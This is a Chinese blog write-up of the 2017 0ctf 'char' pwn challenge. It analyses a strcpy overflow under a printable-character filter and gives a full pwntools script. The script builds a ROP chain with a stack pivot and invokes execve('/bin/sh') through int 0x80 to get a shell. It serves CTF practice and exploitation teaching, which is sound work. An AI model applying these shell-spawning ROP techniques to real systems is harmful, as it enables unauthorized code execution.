2017 0ctf char writeup

最新推荐文章于 2023-03-27 19:04:16 发布
最新推荐文章于 2023-03-27 19:04:16 发布
阅读量888 收藏
点赞数
分类专栏: ctf-writeups 文章标签: 栈(gadgets的较高级运用)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43449190/article/details/89290052
版权

首先提供题目的二进制文件2017-0ctf-char

预览:

拿到题目先预览,发现程序为32位且保护很少,估计应该是栈题,运行一下发现程序似乎很简单。。。放进ida看一下反汇编码,发现程序确实不难,但是有几个需要注意的地方。

我们可以看到程序将libc通过mmap()映射到了固定的0x5555e000处,这等于我们不需要泄露libc就可以确定函数和gadgets的真实地址,带来了极大的方便。比较麻烦的是程序有一个check的函数,检查每个字符必须为可见字符(16进制的大小范围为0x1f~0x7e),但我们又发现,他的v1是由strlen()确定的,我们可以通过scanf()只看空格和回车结束来输入’\x00’使其提前结束。。。。。但我们又发现了一个问题。。。就是在漏洞函数中我们的strcpy也是通过’\x00’来判断的。这就很让人蛋疼。。。。这就是说我们通过strcpy()复制到漏洞点的字符串就是我们截断前的那一小段。。。。

漏洞寻找和分析:

很明显有一个漏洞函数,通过strcpy()造成溢出。这个不难发现,难点在于check()给我们的rop链造成了很大的障碍。check的存在注定我们复制到溢出点的数据长度不可能太长,但无论我们是调用函数并且给函数准备参数还是gadgets都需要占用不少的位置,这几乎是不可能成功的。如下图可见一点:

system()和execve()都过不了检查。。。我们能想到的就是我们必须在小的溢出数据范围内调用一些gadgets而使esp迁移到main的栈数据区域(我们的复制源),而不能在漏洞函数里卡死,迁移到源数据后这题就变得很简单。难点在于gadgets的合适选择和寻找。

漏洞利用:

我是通过观察strcpy()之后发现ecx似乎一直指在源数据的中间固定区域(相对偏移不变),所以想到使ecx的值赋给esp使esp直接跳转,但是通过搜索gadgets发现只能通过 mov eax,ecx; ret; xchg eax,esp; ret b; 来实现紧接着再通过具体的细节调整使跳转过后的esp指向addr_pop_ebx为int 0x80准备参数,准备调用execve(’/bin/sh’,0,0)。具体细节还得自己验证。

exp如下:(调用函数实现的就不写了,请自己调试尝试)

#coding:utf-8

from pwn import *

p = process('./char')
context(os='linux',arch='i386')
#context.log_level = 'debug'

p.recvuntil('GO : ) \n')

base = 0x5555e000
sh_addr = 0x15D7EC
#pop_ebx = 0x109D07 
xor_eax_pop_ebx = 0x7dce9
pop_ecx = 0xcae3b
pop_edx = 0x1a9e
int_0x80 = 0x2df35
inc_eax = 0x26a9b
nop_xor_eax = 0x7403a
xchg_eax_esp_retb = 0xe6d62
mov_eax_ecx = 0x148253

payload = 'a'*0x1c
payload+= p32(mov_eax_ecx+base)  
payload+= p32(mov_eax_ecx+base)
payload+= p32(xchg_eax_esp_retb+base)
payload+= '\x00'*3
payload+= p32(xor_eax_pop_ebx+base)
payload+= p32(sh_addr+base)
payload+= p32(pop_ecx+base)
payload+= p32(0)
payload+= p32(pop_edx+base)
payload+= p32(0)
#payload+= p32(nop_xor_eax+base)      nop_xor_eax+base=0x555d203a    '\x20'空格字符会将在scanf()读的时候将payload截断.
for i in range(11):
	payload+= p32(inc_eax+base)
payload+= p32(int_0x80+base)

pause()
#gdb.attach(p)
p.sendline(payload)

p.interactive()

收货:

  1. gadgets的寻找:通过ROPgadgets --binary *** > gadget 然后再在文件gadget里通过查找功能查找。(再次感谢川大的师傅 orz )
  2. ret x 的意义是 eip 跳转之后esp = esp+4+x。
  3. scanf( ) 看回车和空格结束,str( )系列函数看 ‘\x00’ 结束。
xiao_xiao_ren_wu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
0ctf-2017-pwn-char 题解
lifanxin的博客
02-05 415
Write Up文件信息漏洞定位利用分析wp总结 文件信息 该题目来自20170ctf的一道pwn题–char。 查看文件信息:   只开启了NX保护,32位小端程序 另外该题目还给了libc.so文件,部署时需要将该库文件放到/home/char/目录下,部署的目录位置可以从程序的伪C代码中看出。 漏洞定位 程序的main函数如上图所示,首先程序可以接受2400字符的输入,但注意这里的scanf的读取限制,比如:空格、回车、换行符等等都是无法读入的,这里的限制体现在后面构造ROP链时地址中不能含有以
0ctf-2017-pwn-char-libc.so
02-05
20170ctf的pwn题char的libc库文件
[BUUCTF-pwn] 0ctf_2017_char
weixin_52640415的博客
01-13 133
带检查的溢出 程序先把libc.so调入可读堆块中,地址固定0x5555e010,这里可以提供大量rop资源 用scanf读入,这里比较坑,0x20,0x09,0x0a,0x0b都不能输入,需要换成其它的 在最后调用函数里有strcpy会形成溢出,但是会检查每个字符都在31-126之间。 char *__cdecl sub_8048678(char *src) { char dest[28]; // [esp+Ch] [ebp-1Ch] BYREF return strcpy(dest,
【反序列化漏洞01】序列化与反序列化简介
Fighting_hawk的博客
03-19 4683
1. 了解序列化与反序列化的作用; 2. 掌握PHP中序列化与反序列化的使用方法。
BMZCTF ssrfme 端午节就该吃粽子 pchar???
weixin_52268949的博客
03-27 403
空格等特殊字符如果不进行编码,服务器在处理的时候可能出现问题,通过浏览器的方式访问的话,空格会自动编码为%20或者+,但我们通过上述方法嵌套参数,让服务器自己去请求http的时候就会出现问题,解决方法是进行二次编码。因为第二点说了web服务器默认就会对解析后的参数进行url解码,所以php最开始解析我们的参数时进行了一个解码,服务器通过http伪协议去访问时又会对解析后的参数进行一次解码,所以我们可以进行二次编码。|拼接执行指令\绕过对cat的匹配${IFS}绕过对空格的匹配,?并且长度不能大于70。
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库中,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。目录 ...
0ctf-2017-pwn-char
02-05
20170ctf的pwn题,题目质量还是非常高的,要求做题人需要扎实的shellcode编写能力和ROP链构造能力,下面给出wp链接:https://blog.csdn.net/A951860555/article/details/113666423
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
阿里云ctf比赛writeup
04-26
阿里云ctf比赛writeup ,包含web,misc,pwn,reverse,crypto.
CTF-writeup
03-19
CTF-writeup
2017湖湘杯pwn200
12-02
2017湖湘杯pwn200的题目,请大家自行下载。。。。。。
2019 CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
CTF安全大赛必刷题
Writeup.rar
12-01
Writeup.rar
2018上海CTF“骇极杯”逆向WP
11-12
2018上海CTF“骇极杯”逆向WP2018上海CTF“骇极杯”逆向WP
安恒ctf misc crypto 培训资料合集
10-06
安恒ctf misc crypto合集 加解密rsa 隐写 图片隐写 现代密码 古典密码 ppt
【4.29安恒杯】writeup
热门推荐
wintersun的地带
04-19 1万+
#### 安恒杯_writeup 以下为比赛中做出的题目MISC: SHOW ME THE FLAGCRYPTO: LAZYATTACK这一题很巧,全部的队伍里面只有我们一个队伍将其做出来。 这一题做出来完完全全是靠运气,在当我做出这一题的时候感觉是懵逼的,完全不知道是怎么回事,flag一下子就出来了而且对了,很兴奋。队友都相互说用了和出题人同一个软件,才得到的答案。结果确实是和出题人用
0ctf2017 pwn babyheap
weixin_30512043的博客
07-25 199
题目:http://uaf.io/exploitation/2017/03/19/0ctf-Quals-2017-BabyHeap2017.html 0x00:运行程序 user@ubuntu:~/workspace/pwn$ ./0ctfbabyheap ===== Baby Heap in 2017 ===== 1. Allocate 2. Fill 3. F...
0CTF2017 WEB WriteUp
Bendawang's Blog
03-20 9669
0CTF2017 WEB WriteUp
0ctf2017-babypwn
CharlesGodX的博客
09-10 772
前言 本片文章从0ctf2017-babyheap这一道pwn题目入手,讲解pwn堆中的一些利用手法 题目链接 分析程序 首先检查程序保护,所有的保护措施都是开启的,这意味着我们想要改写程序流程考虑从malloc_hook和free_hook入手 [*] '/home/thunder/Desktop/codes/ctf/pwn/heap/0ctf_babyheap/0ctfbabyheap' ...
ctf从0到1电子书
最新发布
12-14
《CTF从0到1》是一本针对CTF(Capture The Flag)竞赛的电子书,旨在帮助初学者快速入门和提高他们的技能。该书包括了CTF竞赛的基础知识、技巧和策略,并提供了详细的实例和实战练习,帮助读者从零开始逐步建立起...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值